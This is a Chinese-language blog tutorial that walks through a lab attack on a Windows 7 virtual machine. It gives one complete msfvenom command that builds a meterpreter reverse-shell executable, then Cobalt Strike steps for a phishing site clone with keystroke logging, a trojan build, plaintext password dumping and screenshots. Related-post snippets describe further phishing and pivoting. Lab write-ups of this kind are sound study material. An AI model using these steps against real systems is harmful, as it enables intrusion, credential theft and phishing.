MSF恶意程序利用——CS上线

已于 2023-08-07 18:30:59 修改
阅读量665 收藏 8
点赞数
分类专栏: 网络运维 文章标签: 网络安全
于 2023-08-07 18:20:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/C_huid/article/details/132150844
版权

Msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。

申明:本篇文章的用意仅做学习使用!

网络搭建环境:

软件:Vmware Workstation 17

攻击机:Kali

靶机环境:Windows 7

实验内容:

制作Windows恶意软件获取shell

Msfvenom的shell在windows中使用msfvenom生成shell.exe

实验步骤:

第1步:在kali系统上生成chuid.exe文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.129 LPORT=6060 -f exe > chuid.exe

 第2步:将生成的shell上传到windows主机中并运行,提示有返回即可控制对方电脑

第3步:启动metaspliot

第4步:metasploit设置侦听

在windows7的任务管理器里面可以看到chuid.exe这个进程在后台运行 

 第5步:在kali系统里面进入Windows系统DOS界面尝试打开百度网页和计算器

  Cobalt Strike 一款以由美国redteam团队,研发出来的一款以Metasploit为基础的GUI框架 式渗透测试工具

1、利用CS做网站克隆+键盘监听

运行CS可执行文件 

 Cobalt Strike的使用

实验1:利用Cobalt Strike 克隆http网址的网站(https为加密网站,所以克隆不了)

第1步:点击Cobalt Strike选项 > 监听器 > 创建监听器

 

 第2步:点击攻击选项,选择web钓鱼 > 网站克隆

 

 第3步:复制克隆成功的URL地址,在浏览器中进行访问

 注意:如果要克隆另一个网站,需要修改本地端口(不能与其他克隆网站的端口相同)

键盘监听

第4步:点击视图选项 >  web日志,可以看到键盘监听的结果

  1. 生成木马病毒,进行后渗透操作

第1步:点击攻击 > 生成后门 > Windows可执行程序

 第2步:选择监听器,勾选使用x64 payload

第3步:选择exe木马的生成地址路径 

 第4步:将生成的artifact.exe木马文件复制到Windows 7(靶机),双击运行木马程序(记得关闭杀毒软件)

在Cobalt Strike上可以看到已经上线了 

第5步:右键点击上线的靶机,将会话操作中的回连间隔改为0 

第6步:右键点击凭证提权 > 抓取明文密码,获取(Windows 7)靶机的用户名和密码 

第7步:可以使用screenshot命令对靶机进行桌面截图 

点击视图 > 屏幕截图,可以看到截取的靶机图片

 拓展

Windows 10系统(物理机)上运行CS木马程序,在Cobalt Strike上也显示win 10系统上线了

陳Huid
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
内网渗透-cs之钓鱼测试攻击
lza20001103的博客
05-08 3115
cs之模拟钓鱼攻击
内网安全学习(八)---CS&MSF联动
qi_SJQ_的博客
02-17 3614
域横向 CS&MSF 联动 Shell CS->MSF: 创建Foreign监听MSF监听模块设置对应端口地址 CS执行Spawn选择监听MSF->CSCS创建监听MSF载入新模块注入设置对应地址端口 执行CS等待上线 use exploit/windows/local/payload_inject 首先需要两台服务器,一个上线cs一个上线msf 启动上线cs生成木马上线两台主机,之后启动msf。 1)接下来,将CS移交到MSF上: 先添会话,填写msf主机信息: 配
CS使用+后渗透
2302_79348448的博客
08-16 505
使用了C/S架构,它分为客户端和服务端,服务端只要一个,客户端可有多个,多人 连接服务端后可协同测试,与其他人分享shell。此时将木马放入win7中,可以利用之前所写的ms17-010(永恒之蓝)漏洞,使用upload命令将木马文件上传win7桌面。右键点击上线的靶机,然后在session(会话操作)里面将,sleep(回连间隔)的参数改为0。Windows里面,转到中途站主机上,如果木马不见了的话,是因为防火墙自动杀掉了,将木马放到靶机win7中,放入之后,双击木马,之后CS会提示上线
黑客养成计划-熟悉MSF并拿下一部android
最新发布
小司机的奥拓
05-06 547
本文仅用于学习和技术探讨,不作为任何恶意行为能力传播,本质上,只是想让大家学习了解MSF。Metasploit Framework (MSF)是目前所能接触到的软件渗透测试工具中最知名的工具,包括数千个工具和模块,可用于探索和利用漏洞、执行调查、测试和工具/有效负载创建等,对攻击者、防御者来说都是爱恨交。三个版本.
Cobalt Strike之网站克隆
浅笑996的博客
11-16 4079
点击 attack --> Web-dirve-by --> clone file 填写你要克隆网站。带有端口 Clone URL:克隆目标网站的URL 注意问题:URL需要添http协议和端口(80) Local URL:本地克隆路径 Local Host:本地主机IP Local Port:本地端口 Attack:克隆后目标网站执行脚本,如:flash漏洞 克隆成功 ...
内网渗透神器CobaltStrike之钓鱼攻击(六)
xf555er的博客
11-22 2804
office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
生成克隆钓鱼网站与对win7进行后渗透操作
weixin_72543266的博客
09-10 1143
本篇文章是对自己使用CS部署钓鱼网站和通过生成木马对win7进行后渗透操作的一次实战,通过实战来去熟悉一些渗透测试过程中会遇到的一些操作,为自己以后的学习打好基础,也能去了解更多其他方面的一些知识.本文章是继上次进行手机木马远控复现后,进行钓鱼网站的搭建和使用木马文件后渗透的实操,在进行实战过程中遇到过,无法打开CS工具,也遇到过生成的木马文件在root文件夹中无法取出,说到达自己还是实战经验不足,但自己总能在遇到问题后冷静分析,并自己主动去解决问题,我很庆幸自己有这个能力,自己喜欢去依赖他人去解决问题,虽
使用cs网站克隆+键盘监听
weixin_66993139的博客
10-16 193
创建克隆网站(克隆url中只能是http协议)2,进入cs目录,并赋予可读可写可执行的权限。1,将该cs压缩包单独放入一个文件。查看web日志(最终实现键盘监控)linux中直接运行该文件。3,设置cs的IP和密码。
CVE-2018-2883漏洞利用程序msf
03-27
CVE-2018-2883漏洞利用程序
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
linux系统安装msf的过程详解
09-14
在Linux系统中安装Metasploit Framework(MSF)是一个重要的步骤,对于网络安全研究者和渗透测试人员来说,这是必备的工具。以下是一个详尽的安装教程,特别针对阿里云Linux系统。 首先,确保你的系统已经更新到...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
网络安全入门学习练手——CS伪装钓鱼网站
p36273的博客
05-19 1667
输入账号密码后,点击登录,会自动刷新跳回原来的登录页面,这个可能是CS平台自带的机制,不清楚的还以为是密码不正确导致登录失败呢。这时候就是可以随时监听钓鱼网站,而不用每次都得克隆网址了。Cobalt Strike平台(CS
渗透测试实战-CS工具使用
10-02 4071
使用Cobalt Strike工具渗透测试,本文包含搭建CS服务器,通过生成克隆钓鱼网站和生成木马进行后渗透,熟悉使用CS工具和理解测试原理。
MSF&CS互相联动
剁椒鱼头没剁椒的博客
07-28 1704
在日常渗透测试或者是你偷偷干坏事的时候,可能会发现,CS确实是一个强大的后渗透工具,但是奈何CS很多关于漏洞的功能都是只能检测,但是不能攻击,所以需要CSMSF互相联动起来,这里我就利用一个永恒之蓝漏洞来。
漏洞复现:通过CVE-2022-30190上线CS
克格莫
08-09 1583
漏洞复现
Cobalt Strike(CS)介绍,安装及初步使用(学习笔记1)
m0_63239459的博客
03-05 3615
Cobalt Strike工具学习(新手级教程)
MSFCS联动】
一纸荒芜的博客
08-27 2404
msfcs
MSF 上线linux
03-18
MSF(Metasploit Framework)中,上线Linux主机是指通过漏洞利用或其他方式成功获取对目标Linux系统的控制权限。下面是一种常见的上线Linux主机的方法: 1. 扫描目标:使用MSF中的扫描模块,如nmap或auxiliary/scanner/tcp/syn扫描器,来确定目标主机的开放端口和服务。 2. 选择合适的漏洞利用模块:根据目标主机的开放端口和服务,选择合适的漏洞利用模块。例如,如果目标主机开放了SSH服务,可以使用exploit/unix/ssh/login_pubkey模块进行漏洞利用。 3. 配置漏洞利用模块:根据目标主机的具体情况,配置漏洞利用模块的参数。例如,设置目标IP地址、用户名、密码等。 4. 运行漏洞利用模块:运行漏洞利用模块,尝试获取对目标Linux系统的控制权限。 5. 上线成功:如果漏洞利用成功,你将获得对目标Linux系统的控制权限,并可以执行各种操作,如查看文件、执行命令等。 请注意,上线Linux主机是一项涉及安全攻击和渗透测试的技术,请确保在合法和授权的情况下使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值